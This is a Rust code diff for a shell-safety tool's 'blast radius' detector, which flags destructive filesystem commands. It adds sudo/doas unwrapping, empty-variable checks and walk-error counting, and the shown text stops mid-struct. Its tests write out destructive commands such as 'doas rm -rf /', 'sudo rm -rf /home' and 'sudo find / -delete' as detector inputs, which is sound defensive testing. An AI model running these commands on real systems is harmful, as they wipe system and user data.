+    #[test]
+    fn cheap_check_relative_target_is_silent() {
+        // The whole point of the hot/cold split: `rm -rf ./dist` is NOT a
+        // system path, so the cheap path must stay silent and leave the
+        // counting to `tirith preview`.
+        let f = cheap_check("rm -rf ./dist", ShellType::Posix, &empty_env());
+        assert!(
+            f.is_empty(),
+            "relative target must not fire on the cheap path, got {:?}",
+            f.iter().map(|f| f.rule_id).collect::<Vec<_>>()
+        );
+    }
+
+    #[test]
+    fn cheap_check_mv_to_root() {
+        let f = cheap_check("mv important /", ShellType::Posix, &empty_env());
+        assert!(f.iter().any(|f| f.rule_id == RuleId::BlastWritesSystemPath));
+    }
+
+    #[test]
+    fn cheap_check_chmod_skips_mode_operand() {
+        // `0777` is the mode, `/etc` is the target — the mode must not be
+        // mistaken for a target, and `/etc` must fire (recursive).
+        let f = cheap_check("chmod -R 0777 /etc", ShellType::Posix, &empty_env());
+        assert!(f.iter().any(|f| f.rule_id == RuleId::BlastWritesSystemPath));
+    }
+
+    #[test]
+    fn cheap_check_non_recursive_chmod_does_not_fire() {
+        // The spec scopes the chmod shape to `chmod -R`: a non-recursive chmod
+        // on a system path touches one entry, not a tree, so it must not fire.
+        let f = cheap_check("chmod 0644 /etc", ShellType::Posix, &empty_env());
+        assert!(
+            !f.iter().any(|f| f.rule_id == RuleId::BlastWritesSystemPath),
+            "non-recursive chmod must not fire the system-path rule"
+        );
+    }
+
+    #[test]
+    fn simulate_counts_files_in_temp_tree() {
+        let dir = tempfile::tempdir().unwrap();
+        let target = dir.path().join("dist");
+        fs::create_dir_all(&target).unwrap();
+        fs::write(target.join("a.txt"), b"hello").unwrap();
+        fs::write(target.join("b.txt"), b"world!!").unwrap();
+        fs::create_dir_all(target.join("nested")).unwrap();
+        fs::write(target.join("nested/c.txt"), b"x").unwrap();
+
+        let report = simulate(
+            "rm -rf ./dist",
+            ShellType::Posix,
+            dir.path(),
+            Some(dir.path()),
+            &empty_env(),
+        );
+        assert_eq!(report.file_count, 3);
+        assert!(report.dir_count >= 2); // dist + nested
+        assert!(!report.paths_outside_repo, "./dist is inside the repo");
+        assert!(!report.writes_system_path);
+        // Largest file is b.txt (7 bytes).
+        let (lp, ls) = report.largest_file.unwrap();
+        assert_eq!(ls, 7);
+        assert!(lp.ends_with("b.txt"));
+    }
+
+    #[test]
+    fn simulate_counts_symlinks_without_following() {
+        let dir = tempfile::tempdir().unwrap();
+        let target = dir.path().join("d");
+        fs::create_dir_all(&target).unwrap();
+        fs::write(target.join("real.txt"), b"data").unwrap();
+        #[cfg(unix)]
+        {
+            std::os::unix::fs::symlink("/etc/hosts", target.join("link")).unwrap();
+            let report = simulate(
+                "rm -rf ./d",
+                ShellType::Posix,
+                dir.path(),
+                Some(dir.path()),
+                &empty_env(),
+            );
+            assert_eq!(report.symlink_count, 1);
+            assert_eq!(
+                report.file_count, 1,
+                "symlink must not be followed/counted as a file"
+            );
+            let f = report_findings(&report);
+            assert!(f.iter().any(|f| f.rule_id == RuleId::BlastSymlinkTraversal));
+        }
+    }
+
+    #[test]
+    fn simulate_detects_outside_repo() {
+        let dir = tempfile::tempdir().unwrap();
+        let repo = dir.path().join("repo");
+        let outside = dir.path().join("outside");
+        fs::create_dir_all(&repo).unwrap();
+        fs::create_dir_all(&outside).unwrap();
+        fs::write(outside.join("f.txt"), b"x").unwrap();
+
+        // cwd is the repo; target climbs out via `../outside`.
+        let report = simulate(
+            "rm -rf ../outside",
+            ShellType::Posix,
+            &repo,
+            Some(&repo),
+            &empty_env(),
+        );
+        assert!(
+            report.paths_outside_repo,
+            "../outside escapes the repo root"
+        );
+        let f = report_findings(&report);
+        assert!(f
+            .iter()
+            .any(|f| f.rule_id == RuleId::BlastDeletesOutsideRepo));
+    }
+
+    #[test]
+    fn simulate_large_file_count_info() {
+        let dir = tempfile::tempdir().unwrap();
+        let target = dir.path().join("many");
+        fs::create_dir_all(&target).unwrap();
+        for i in 0..1001 {
+            fs::write(target.join(format!("f{i}.txt")), b"x").unwrap();
+        }
+        let report = simulate(
+            "rm -rf ./many",
+            ShellType::Posix,
+            dir.path(),
+            Some(dir.path()),
+            &empty_env(),
+        );
+        assert!(report.file_count > LARGE_FILE_COUNT_THRESHOLD);
+        let f = report_findings(&report);
+        assert!(f.iter().any(|f| f.rule_id == RuleId::BlastLargeFileCount));
+    }
+
+    #[test]
+    fn simulate_glob_expansion_counted() {
+        let dir = tempfile::tempdir().unwrap();
+        fs::write(dir.path().join("a.log"), b"x").unwrap();
+        fs::write(dir.path().join("b.log"), b"x").unwrap();
+        fs::write(dir.path().join("keep.txt"), b"x").unwrap();
+        let report = simulate(
+            "rm -f *.log",
+            ShellType::Posix,
+            dir.path(),
+            Some(dir.path()),
+            &empty_env(),
+        );
+        assert_eq!(report.glob_expansion_count, 2, "*.log matches two files");
+        assert_eq!(report.file_count, 2);
+    }
+
+    #[test]
+    fn simulate_empty_var_glob_is_system_and_outside() {
+        let dir = tempfile::tempdir().unwrap();
+        let report = simulate(
+            "rm -rf \"$EMPTY/\"",
+            ShellType::Posix,
+            dir.path(),
+            Some(dir.path()),
+            &empty_env(),
+        );
+        assert!(report.unsafe_empty_var_glob);
+        assert!(report.writes_system_path);
+        assert!(report.paths_outside_repo);
+        // We do NOT walk `/`.
+        assert_eq!(report.file_count, 0);
+    }
+
+    #[test]
+    fn glob_match_basic() {
+        assert!(glob_match("*.log", "a.log"));
+        assert!(glob_match("*.log", "b.log"));
+        assert!(!glob_match("*.log", "keep.txt"));
+        assert!(glob_match("f?.txt", "f1.txt"));
+        assert!(!glob_match("f?.txt", "f12.txt"));
+        assert!(glob_match("*", "anything"));
+    }
+
+    #[test]
+    fn empty_var_glob_var_recognizes_shapes() {
+        let env = empty_env();
+        assert_eq!(
+            empty_var_glob_var("$EMPTY/", &env),
+            Some("EMPTY".to_string())
+        );
+        assert_eq!(
+            empty_var_glob_var("${EMPTY}/", &env),
+            Some("EMPTY".to_string())
+        );
+        assert_eq!(
+            empty_var_glob_var("$EMPTY", &env),
+            Some("EMPTY".to_string())
+        );
+        // A non-slash tail (`$EMPTY.bak`) is NOT a path-prefix shape — the var
+        // name is `EMPTY` followed by `.bak`, which does not collapse to root.
+        assert_eq!(empty_var_glob_var("$EMPTY.bak", &env), None);
+        // `$EMPTYsuffix` IS a distinct (unset) variable named `EMPTYsuffix`,
+        // which in shell collapses to root just like `$EMPTY` — so it fires.
+        assert_eq!(
+            empty_var_glob_var("$EMPTYsuffix", &env),
+            Some("EMPTYsuffix".to_string())
+        );
+        // No `$` prefix.
+        assert_eq!(empty_var_glob_var("dist/", &env), None);
+    }
+}

--- a/crates/tirith-core/src/blast_radius.rs
+++ b/crates/tirith-core/src/blast_radius.rs
@@ -73,6 +73,26 @@ pub struct BlastReport {
     /// True when the walk hit [`MAX_FILE_COUNT`] / [`MAX_WALK_DEPTH`] and the
     /// counts are therefore lower bounds, not exact.
     pub walk_truncated: bool,
+    /// Number of directories/entries the walk could NOT read (permission denied,
+    /// I/O error, symlink loop). When `> 0` the counts are LOWER BOUNDS for a
+    /// different reason than truncation: a subtree was skipped silently, so a
+    /// `preview` over a restricted tree must not present its counts as complete.
+    pub walk_errors: u64,
+}
+
+/// How an empty-`$VAR`-glob target resolved against the (tirith-process) env.
+/// Drives the severity split in [`cheap_check`] (F2): tirith only sees its OWN
+/// environment, not the interactive shell's, so an ABSENT var might be a benign
+/// non-exported shell-local — we must not BLOCK on it.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+enum EmptyVarKind {
+    /// The variable is present in tirith's env and set to the empty string.
+    /// Unambiguously collapses to a root path → High.
+    PresentEmpty,
+    /// The variable is absent from tirith's env. It collapses to root IFF the
+    /// shell also has it unset — but it could be a non-exported shell-local that
+    /// IS set. Tirith can't tell, so this is an advisory Info, not a Block (F2).
+    Absent,
 }
 
 /// A destructive filesystem operation recognized by the blast-radius surface.
@@ -172,17 +192,42 @@ pub fn cheap_check(
 
         for target in &parsed.targets {
             // Empty-`$VAR/` glob: `rm -rf "$EMPTY/"` collapses to `rm -rf "/"`.
-            if let Some(var) = empty_var_glob_var(target, env_map) {
+            // F2: tirith only sees its OWN process env, not the interactive
+            // shell's. A var that is PRESENT-and-empty is an unambiguous collapse
+            // (High/Block). A var that is merely ABSENT might be a non-exported
+            // shell-local that is actually set, so we cannot safely block — emit
+            // Info with a note instead of a false High.
+            if let Some((var, kind)) = empty_var_glob_var(target, env_map) {
+                let (severity, description) = match kind {
+                    EmptyVarKind::PresentEmpty => (
+                        Severity::High,
+                        "An argument of the shape `\"$VAR/\"` where `VAR` is set to the empty \
+                         string expands to `\"/\"`, so this command would operate on the \
+                         filesystem root. Quote-and-set the variable, or guard with \
+                         `${VAR:?must be set}`."
+                            .to_string(),
+                    ),
+                    EmptyVarKind::Absent => (
+                        Severity::Info,
+                        format!(
+                            "The argument references `${var}`, which is NOT set in tirith's \
+                             environment. If `${var}` is also unset in your shell, `\"${var}/\"` \
+                             collapses to `\"/\"` (a filesystem-root delete); if it is a \
+                             non-exported shell-local that IS set, this is harmless — tirith \
+                             cannot see shell-locals, so this is advisory only. Run \
+                             `tirith preview` in the same shell to resolve it, or guard with \
+                             `${{{var}:?must be set}}`."
+                        ),
+                    ),
+                };
                 findings.push(finding(
                     RuleId::BlastEmptyVarGlob,
-                    Severity::High,
-                    "destructive command targets an empty-variable path that collapses to root",
-                    "An argument of the shape `\"$VAR/\"` where `VAR` is unset/empty expands to \
-                     `\"/\"`, so this command would operate on the filesystem root. Quote-and-set \
-                     the variable, or guard with `${VAR:?must be set}`.",
+                    severity,
+                    "destructive command targets an empty-variable path that may collapse to root",
+                    &description,
                     Evidence::Text {
                         detail: format!(
-                            "argument '{target}' references empty variable '${var}' → collapses to a root path"
+                            "argument '{target}' references empty variable '${var}' → may collapse to a root path"
                         ),
                     },
                 ));
@@ -256,7 +301,7 @@ pub fn simulate(
 
             // Expand the target (glob against cwd, else literal) into concrete
             // paths.
-            let expanded = expand_target(target, cwd);
+            let expanded = expand_target(target, cwd, &mut report);
             if expanded.len() > 1 || target_is_glob(target) {
                 report.glob_expansion_count += expanded.len() as u64;
             }
@@ -342,14 +387,90 @@ fn parse_fs_op(seg: &tokenize::Segment) -> Option<ParsedFsOp> {
     let leader = seg.command.as_deref()?;
     let leader = leader_name(leader);
 
+    // Unwrap a leading `sudo`/`doas` so `sudo rm -rf /home` is recognized as the
+    // destructive `rm` it really is. Privilege escalation makes the op strictly
+    // MORE dangerous — it must NOT drop out of the blast-radius check. This
+    // mirrors `engine::baseline_shared_components`, which also de-sudo's the
+    // leader before classifying the wrapped command.
+    if matches!(leader, "sudo" | "doas") {
+        let (wrapped_leader, wrapped_args) = unwrap_sudo(&seg.args)?;
+        return parse_op_for_leader(leader_name(&wrapped_leader), &wrapped_args);
+    }
+
+    parse_op_for_leader(leader, &seg.args)
+}
+
+/// Match a (de-sudo'd) leader name + its args onto a destructive-op descriptor.
+fn parse_op_for_leader(leader: &str, args: &[String]) -> Option<ParsedFsOp> {
     match leader {
-        "rm" => Some(parse_simple(FsOp::Rm, &seg.args)),
-        "mv" => Some(parse_simple(FsOp::Mv, &seg.args)),
-        "chmod" => Some(parse_simple(FsOp::Chmod, &seg.args)),
-        "find" => parse_find(&seg.args),
-        "rsync" => parse_rsync(&seg.args),
+        "rm" => Some(parse_simple(FsOp::Rm, args)),
+        "mv" => Some(parse_simple(FsOp::Mv, args)),
+        "chmod" => Some(parse_simple(FsOp::Chmod, args)),
+        "find" => parse_find(args),
+        "rsync" => parse_rsync(args),
         _ => None,
     }
+}
+
+/// Given the args of a `sudo`/`doas` invocation, skip sudo's own flags (and
+/// their values), leading `VAR=value` environment assignments, and an optional
+/// `--` terminator, then return the WRAPPED command (leader + its args).
+/// Returns `None` when no wrapped command follows (e.g. `sudo -v`).
+fn unwrap_sudo(args: &[String]) -> Option<(String, Vec<String>)> {
+    // sudo short flags that consume the NEXT token as their value.
+    const VALUE_SHORT: [&str; 6] = ["-u", "-g", "-C", "-D", "-R", "-T"];
+    // sudo long flags that consume the next token (the `--flag=value` form is
+    // self-contained and handled by the `contains('=')` branch below).
+    const VALUE_LONG: [&str; 9] = [
+        "--user",
+        "--group",
+        "--close-from",
+        "--chdir",
+        "--role",
+        "--type",
+        "--other-user",
+        "--host",
+        "--prompt",
+    ];
+
+    let mut idx = 0;
+    while idx < args.len() {
+        let a = strip_outer_quotes(&args[idx]);
+        if a == "--" {
+            idx += 1;
+            break;
+        }
+        if a.starts_with("--") {
+            let name = a.split('=').next().unwrap_or(a);
+            // `--flag=value` is self-contained; a bare `--flag` from VALUE_LONG
+            // eats the following token.
+            if !a.contains('=') && VALUE_LONG.contains(&name) {
+                idx += 2;
+            } else {
+                idx += 1;
+            }
+            continue;
+        }
+        if a.starts_with('-') && a.len() > 1 {
+            if VALUE_SHORT.contains(&a) {
+                idx += 2;
+            } else {
+                idx += 1;
+            }
+            continue;
+        }
+        // A leading `VAR=value` is an environment assignment, not the command.
+        if a.contains('=') && !a.starts_with('/') {
+            idx += 1;
+            continue;
+        }
+        // First non-flag, non-assignment token is the wrapped leader.
+        break;
+    }
+
+    let leader = args.get(idx).map(|s| strip_outer_quotes(s).to_string())?;
+    let wrapped_args: Vec<String> = args[idx + 1..].to_vec();
+    Some((leader, wrapped_args))
 }
 
 /// Strip a leading path component from a leader so `/bin/rm` matches `rm`.
@@ -475,14 +596,35 @@ fn is_recursive_flag(a: &str) -> bool {
 /// (the trailing slash is the canonical footgun but a bare empty `$VAR` operand
 /// is equally a collapse). The variable must resolve to empty for the rule to
 /// fire — a set variable is a normal expansion and not flagged here.
-fn empty_var_glob_var(arg: &str, env_map: &HashMap<String, String>) -> Option<String> {
+///
+/// A braced form carrying a parameter-expansion operator
+/// (`${VAR:-default}`, `${VAR:?msg}`, `${VAR:+alt}`, `${VAR#pat}`, …) is NOT
+/// eligible: `:-`/`:=`/`:+` SUPPLY or substitute a value, `#`/`%`/`/` TRANSFORM
+/// it, and `:?`/`?` ABORT the command on empty — none of these can silently
+/// collapse to `"/"`. Treating them as empty-var globs false-positives on the
+/// rule's OWN recommended guard (`${VAR:?must be set}`). Only the bare
+/// `${NAME}` form (name = all `[A-Za-z0-9_]`) is eligible.
+fn empty_var_glob_var(
+    arg: &str,
+    env_map: &HashMap<String, String>,
+) -> Option<(String, EmptyVarKind)> {
     let rest = arg.strip_prefix('$')?;
 
     // `${VAR}` / `${VAR}/...` form.
     let (name, tail) = if let Some(braced) = rest.strip_prefix('{') {
         let end = braced.find('}')?;
-        let name = &braced[..end];
-        (name, &braced[end + 1..])
+        let body = &braced[..end];
+        // Reject any parameter-expansion operator inside the braces. The bare
+        // name runs while `[A-Za-z0-9_]`; if the body has trailing characters
+        // after the name, it carries an operator (`:-`, `-`, `=`, `?`, `+`,
+        // `#`, `%`, `/`, …) that defeats the empty-collapse, so it must not fire.
+        let name_end = body
+            .find(|c: char| !(c.is_ascii_alphanumeric() || c == '_'))
+            .unwrap_or(body.len());
+        if name_end != body.len() {
+            return None;
+        }
+        (&body[..name_end], &braced[end + 1..])
     } else {
         // `$VAR` / `$VAR/...` form — name runs while alnum/underscore.
         let end = rest
@@ -501,11 +643,14 @@ fn empty_var_glob_var(arg: &str, env_map: &HashMap<String, String>) -> Option<St
         return None;
     }
 
-    let resolved = env_map.get(name).map(String::as_str).unwrap_or("");
-    if resolved.is_empty() {
-        Some(name.to_string())
-    } else {
-        None
+    match env_map.get(name) {
+        // Present and set to "" → unambiguous collapse → High.
+        Some(v) if v.is_empty() => Some((name.to_string(), EmptyVarKind::PresentEmpty)),
+        // Present and non-empty → normal expansion, never collapses.
+        Some(_) => None,
+        // Absent from tirith's env → MIGHT be an unset shell var (collapse) OR a
+        // non-exported shell-local that is actually set. Advisory only (F2).
+        None => Some((name.to_string(), EmptyVarKind::Absent)),
     }
 }
 
@@ -547,6 +692,9 @@ fn is_system_path(p: &str) -> bool {
             | "/sbin/"
             | "/boot/"
             | "/root/"
+            | "/sys/"
+            | "/proc/"
+            | "/dev/"
     )
 }
 
@@ -573,9 +721,9 @@ fn strip_outer_quotes(s: &str) -> &str {
 /// Expand a target into concrete paths. Globs (`*`/`?`/`[`) are expanded against
 /// `cwd` by a single-directory match (we do NOT implement recursive `**`).
 /// Non-glob targets resolve to a single cwd-relative path.
-fn expand_target(target: &str, cwd: &Path) -> Vec<PathBuf> {
+fn expand_target(target: &str, cwd: &Path, report: &mut BlastReport) -> Vec<PathBuf> {
     if target_is_glob(target) {
-        glob_in_cwd(target, cwd)
+        glob_in_cwd(target, cwd, report)
     } else {
         vec![resolve_relative(target, cwd)]
     }
@@ -601,7 +749,7 @@ fn resolve_relative(target: &str, cwd: &Path) -> PathBuf {
 /// `<dir>`, and keep entries whose name matches the basename pattern. Only the
 /// basename component may contain a wildcard (good enough for the common
 /// `./dist/*` / `*.log` shapes a preview needs).
-fn glob_in_cwd(pattern: &str, cwd: &Path) -> Vec<PathBuf> {
+fn glob_in_cwd(pattern: &str, cwd: &Path, report: &mut BlastReport) -> Vec<PathBuf> {
     let (dir_part, name_part) = match pattern.rsplit_once('/') {
         Some((d, n)) => (d.to_string(), n.to_string()),
         None => (String::new(), pattern.to_string()),
@@ -613,14 +761,19 @@ fn glob_in_cwd(pattern: &str, cwd: &Path) -> Vec<PathBuf> {
     };
 
     let mut out = Vec::new();
-    if let Ok(entries) = std::fs::read_dir(&dir) {
-        for entry in entries.flatten() {
-            let name = entry.file_name();
-            let name = name.to_string_lossy();
-            if glob_match(&name_part, &name) {
-                out.push(entry.path());
+    match std::fs::read_dir(&dir) {
+        Ok(entries) => {
+            for entry in entries.flatten() {
+                let name = entry.file_name();
+                let name = name.to_string_lossy();
+                if glob_match(&name_part, &name) {
+                    out.push(entry.path());
+                }
             }
         }
+        // A glob over an unreadable directory expands to nothing silently;
+        // record it so the report flags the walk as incomplete (F3).
+        Err(_) => report.walk_errors += 1,
     }
     out
 }
@@ -701,7 +854,15 @@ fn canonicalize_lexical(path: &Path, cwd: &Path) -> PathBuf {
 fn walk_into(path: &Path, _cwd: &Path, report: &mut BlastReport) {
     let meta = match std::fs::symlink_metadata(path) {
         Ok(m) => m,
-        Err(_) => return, // nonexistent target — nothing to count.
+        Err(e) => {
+            // A nonexistent target (NotFound) is normal — nothing to count and
+            // not an "incomplete walk". Any OTHER error (e.g. permission denied
+            // on the target itself) means we under-counted; flag it.
+            if e.kind() != std::io::ErrorKind::NotFound {
+                report.walk_errors += 1;
+            }
+            return;
+        }
     };
 
     if meta.file_type().is_symlink() {
@@ -725,7 +886,13 @@ fn walk_dir(dir: &Path, depth: usize, report: &mut BlastReport) {
     }
     let entries = match std::fs::read_dir(dir) {
         Ok(e) => e,
-        Err(_) => return,
+        Err(_) => {
+            // Could not read this directory (permission denied, I/O error): its
+            // whole subtree is silently uncounted. Record it so the report does
+            // not present a partial walk as complete (F3).
+            report.walk_errors += 1;
+            return;
+        }
     };
     for entry in entries.flatten() {
         if report.file_count >= MAX_FILE_COUNT as u64 {
@@ -735,7 +902,10 @@ fn walk_dir(dir: &Path, depth: usize, report: &mut BlastReport) {
         let path = entry.path();
         let meta = match std::fs::symlink_metadata(&path) {
             Ok(m) => m,
-            Err(_) => continue,
+            Err(_) => {
+                report.walk_errors += 1;
+                continue;
+            }
         };
         if meta.file_type().is_symlink() {
             report.symlink_count += 1;
@@ -854,6 +1024,50 @@ mod tests {
     }
 
     #[test]
+    fn cheap_check_brace_default_does_not_fire() {
+        // C2 regression: `${BUILD:-dist}` provides a default, so it can never
+        // collapse to "/". Must NOT fire even when BUILD is absent from the env.
+        let f = cheap_check("rm -rf \"${BUILD:-dist}/\"", ShellType::Posix, &empty_env());
+        assert!(
+            !f.iter().any(|f| f.rule_id == RuleId::BlastEmptyVarGlob),
+            "${{BUILD:-dist}} has a default and must not fire empty-var-glob, got {:?}",
+            f.iter().map(|f| f.rule_id).collect::<Vec<_>>()
+        );
+    }
+
+    #[test]
+    fn cheap_check_brace_required_guard_does_not_fire() {
+        // C2 regression: `${VAR:?msg}` is the rule's OWN recommended guard — it
+        // aborts on empty rather than collapsing, so it must not false-positive.
+        let f = cheap_check(
+            "rm -rf \"${BUILD:?must be set}/\"",
+            ShellType::Posix,
+            &empty_env(),
+        );
+        assert!(
+            !f.iter().any(|f| f.rule_id == RuleId::BlastEmptyVarGlob),
+            "${{BUILD:?msg}} aborts on empty and must not fire"
+        );
+    }
+
+    #[test]
+    fn cheap_check_brace_alt_and_transform_do_not_fire() {
+        // `:+alt`, `#pat`, `%pat`, `/from/to` all supply or transform — none
+        // collapse to root.
+        for form in [
+            "rm -rf \"${BUILD:+x}/\"",
+            "rm -rf \"${BUILD#pre}/\"",
+            "rm -rf \"${BUILD%suf}/\"",
+        ] {
+            let f = cheap_check(form, ShellType::Posix, &empty_env());
+            assert!(
+                !f.iter().any(|f| f.rule_id == RuleId::BlastEmptyVarGlob),
+                "{form} must not fire empty-var-glob"
+            );
+        }
+    }
+
+    #[test]
     fn cheap_check_flags_find_delete() {
         let f = cheap_check("find . -type f -delete", ShellType::Posix, &empty_env());
         assert!(f.iter().any(|f| f.rule_id == RuleId::BlastFindDelete));
@@ -902,6 +1116,54 @@ mod tests {
     fn cheap_check_mv_to_root() {
         let f = cheap_check("mv important /", ShellType::Posix, &empty_env());
         assert!(f.iter().any(|f| f.rule_id == RuleId::BlastWritesSystemPath));
+    }
+
+    #[test]
+    fn cheap_check_sudo_rm_rf_home_blocks() {
+        // C1 regression: `sudo rm -rf /home` must NOT bypass the blast-radius
+        // check. The sudo wrapper is stripped and the wrapped `rm` is matched.
+        let f = cheap_check("sudo rm -rf /home", ShellType::Posix, &empty_env());
+        assert!(
+            f.iter().any(|f| f.rule_id == RuleId::BlastWritesSystemPath),
+            "sudo rm -rf /home must fire BlastWritesSystemPath, got {:?}",
+            f.iter().map(|f| f.rule_id).collect::<Vec<_>>()
+        );
+    }
+
+    #[test]
+    fn cheap_check_doas_rm_rf_root_blocks() {
+        let f = cheap_check("doas rm -rf /", ShellType::Posix, &empty_env());
+        assert!(f.iter().any(|f| f.rule_id == RuleId::BlastWritesSystemPath));
+    }
+
+    #[test]
+    fn cheap_check_sudo_with_flags_and_assignment_unwraps() {
+        // sudo flags (`-u root`), an env assignment, and `--` must all be
+        // skipped to reach the wrapped destructive op.
+        let f = cheap_check(
+            "sudo -u root FOO=bar -- rm -rf /etc",
+            ShellType::Posix,
+            &empty_env(),
+        );
+        assert!(
+            f.iter().any(|f| f.rule_id == RuleId::BlastWritesSystemPath),
+            "wrapped rm under sudo flags must still fire"
+        );
+    }
+
+    #[test]
+    fn cheap_check_sudo_find_delete_unwraps() {
+        let f = cheap_check("sudo find / -delete", ShellType::Posix, &empty_env());
+        assert!(f.iter().any(|f| f.rule_id == RuleId::BlastFindDelete));
+        assert!(f.iter().any(|f| f.rule_id == RuleId::BlastWritesSystemPath));
+    }
+
+    #[test]
+    fn cheap_check_sudo_alone_is_silent() {
+        // `sudo -v` (refresh credentials) has no wrapped command — must not panic
+        // or fire.
+        let f = cheap_check("sudo -v", ShellType::Posix, &empty_env());
+        assert!(f.is_empty());
     }
 
     #[test]
@@ -1024,6 +1286,32 @@ mod tests {
     }
 
     #[test]
+    fn simulate_truncates_past_depth_cap() {
+        // pr-test-analyzer #2: a tree deeper than MAX_WALK_DEPTH must set
+        // walk_truncated = true (the depth-cap DoS guard).
+        let dir = tempfile::tempdir().unwrap();
+        // Build dir/d0/d1/.../d7 (8 levels > MAX_WALK_DEPTH=5), each with a file.
+        let mut nested = dir.path().join("deep");
+        fs::create_dir_all(&nested).unwrap();
+        for i in 0..(MAX_WALK_DEPTH + 3) {
+            nested = nested.join(format!("d{i}"));
+            fs::create_dir_all(&nested).unwrap();
+            fs::write(nested.join("f.txt"), b"x").unwrap();
+        }
+        let report = simulate(
+            "rm -rf ./deep",
+            ShellType::Posix,
+            dir.path(),
+            Some(dir.path()),
+            &empty_env(),
+        );
+        assert!(
+            report.walk_truncated,
+            "a tree deeper than MAX_WALK_DEPTH must set walk_truncated"
+        );
+    }
+
+    #[test]
     fn simulate_glob_expansion_counted() {
         let dir = tempfile::tempdir().unwrap();
         fs::write(dir.path().join("a.log"), b"x").unwrap();
@@ -1057,6 +1345,39 @@ mod tests {
         assert_eq!(report.file_count, 0);
     }
 
+    #[cfg(unix)]
+    #[test]
+    fn simulate_flags_unreadable_subdir_as_walk_error() {
+        // F3 regression: a read_dir permission error on a subtree must increment
+        // walk_errors so the report does not present a partial walk as complete.
+        use std::os::unix::fs::PermissionsExt;
+        let dir = tempfile::tempdir().unwrap();
+        let target = dir.path().join("tree");
+        let locked = target.join("locked");
+        fs::create_dir_all(&locked).unwrap();
+        fs::write(target.join("visible.txt"), b"x").unwrap();
+        fs::write(locked.join("hidden.txt"), b"secret").unwrap();
+        // Remove read/exec on the subdir so its contents can't be enumerated.
+        fs::set_permissions(&locked, fs::Permissions::from_mode(0o000)).unwrap();
+
+        let report = simulate(
+            "rm -rf ./tree",
+            ShellType::Posix,
+            dir.path(),
+            Some(dir.path()),
+            &empty_env(),
+        );
+
+        // Restore perms so tempdir cleanup can remove the tree.
+        let _ = fs::set_permissions(&locked, fs::Permissions::from_mode(0o755));
+
+        assert!(
+            report.walk_errors >= 1,
+            "an unreadable subdir must increment walk_errors, got {}",
+            report.walk_errors
+        );
+    }
+
     #[test]
     fn glob_match_basic() {
         assert!(glob_match("*.log", "a.log"));
@@ -1070,17 +1391,18 @@ mod tests {
     #[test]
     fn empty_var_glob_var_recognizes_shapes() {
         let env = empty_env();
+        // Absent from the (empty) env → Absent kind.
         assert_eq!(
             empty_var_glob_var("$EMPTY/", &env),
-            Some("EMPTY".to_string())
+            Some(("EMPTY".to_string(), EmptyVarKind::Absent))
         );
         assert_eq!(
             empty_var_glob_var("${EMPTY}/", &env),
-            Some("EMPTY".to_string())
+            Some(("EMPTY".to_string(), EmptyVarKind::Absent))
         );
         assert_eq!(
             empty_var_glob_var("$EMPTY", &env),
-            Some("EMPTY".to_string())
+            Some(("EMPTY".to_string(), EmptyVarKind::Absent))
         );
         // A non-slash tail (`$EMPTY.bak`) is NOT a path-prefix shape — the var
         // name is `EMPTY` followed by `.bak`, which does not collapse to root.
@@ -1089,9 +1411,43 @@ mod tests {
         // which in shell collapses to root just like `$EMPTY` — so it fires.
         assert_eq!(
             empty_var_glob_var("$EMPTYsuffix", &env),
-            Some("EMPTYsuffix".to_string())
+            Some(("EMPTYsuffix".to_string(), EmptyVarKind::Absent))
         );
         // No `$` prefix.
         assert_eq!(empty_var_glob_var("dist/", &env), None);
+    }
+
+    #[test]
+    fn empty_var_present_empty_is_high_absent_is_info() {
+        // F2: a var PRESENT-and-empty in tirith's env is an unambiguous collapse
+        // → High. A var merely ABSENT (possible shell-local) → Info, not Block.
+        let mut env = HashMap::new();
+        env.insert("PRESENT_EMPTY".to_string(), String::new());
+        assert_eq!(
+            empty_var_glob_var("$PRESENT_EMPTY/", &env),
+            Some(("PRESENT_EMPTY".to_string(), EmptyVarKind::PresentEmpty))
+        );
+
+        let f_present = cheap_check("rm -rf \"$PRESENT_EMPTY/\"", ShellType::Posix, &env);
+        let present = f_present
+            .iter()
+            .find(|f| f.rule_id == RuleId::BlastEmptyVarGlob)
+            .expect("present-empty var must fire");
+        assert_eq!(
+            present.severity,
+            Severity::High,
+            "a present-and-empty var collapses unambiguously → High"
+        );
+
+        let f_absent = cheap_check("rm -rf \"$ABSENT_SHELL_LOCAL/\"", ShellType::Posix, &env);
+        let absent = f_absent
+            .iter()
+            .find(|f| f.rule_id == RuleId::BlastEmptyVarGlob)
+            .expect("absent var still fires, but advisory");
+        assert_eq!(
+            absent.severity,
+            Severity::Info,
+            "an absent var might be a shell-local → Info, never Block"
+        );
     }
 }

--- a/crates/tirith-core/src/checkpoint.rs
+++ b/crates/tirith-core/src/checkpoint.rs
@@ -513,6 +513,203 @@ pub struct PurgeResult {
     pub freed_bytes: u64,
 }
 
+/// Runtime-state observation captured by `tirith watch` (M10 ch2).
+///
+/// This is a BEST-EFFORT, after-the-fact observation of side effects a watched
+/// command had on the *environment* and *shell startup files* — distinct from
+/// the file-content checkpoint, which tracks the working tree. It is NOT a
+/// network monitor and NOT a security boundary; see the field docs.
+///
+/// `domains_contacted` is populated only when the caller opts into the
+/// experimental `--with-net-hints` heuristic. The empty default means "not
+/// observed", never "no network activity occurred".
+#[derive(Debug, Clone, Default, Serialize, Deserialize, PartialEq, Eq)]
+pub struct PostRunState {
+    /// Best-effort, heuristic DNS-resolver-side domain hints (experimental,
+    /// opt-in via `--with-net-hints`). May miss QUIC/UDP/direct-IP traffic
+    /// entirely. NOT authoritative and NOT a network monitor.
+    #[serde(default)]
+    pub domains_contacted: Vec<String>,
+    /// Names of environment variables present AFTER the run that were absent
+    /// before. Observed by diffing a snapshot of the current process env, so it
+    /// reflects only variables the watched command exported back into tirith's
+    /// own environment (rarely the case for child processes) — primarily useful
+    /// when `tirith watch` is itself invoked from a wrapper that re-exports.
+    #[serde(default)]
+    pub env_vars_added: Vec<String>,
+    /// Directories newly present on `$PATH` after the run (set-difference of the
+    /// colon-split `PATH` before vs after).
+    #[serde(default)]
+    pub path_dirs_added: Vec<String>,
+}
+
+/// A before/after snapshot pair for the `tirith watch` runtime-state diff.
+///
+/// Captured by [`capture_runtime_state`] immediately before and after the
+/// watched command, then compared by [`diff_runtime_state`]. Kept separate from
+/// the file-content [`CheckpointMeta`] so the two concerns (working-tree files
+/// vs environment/PATH/shell-rc) stay independently testable.
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct RuntimeStateSnapshot {
+    /// Names of every environment variable visible at capture time.
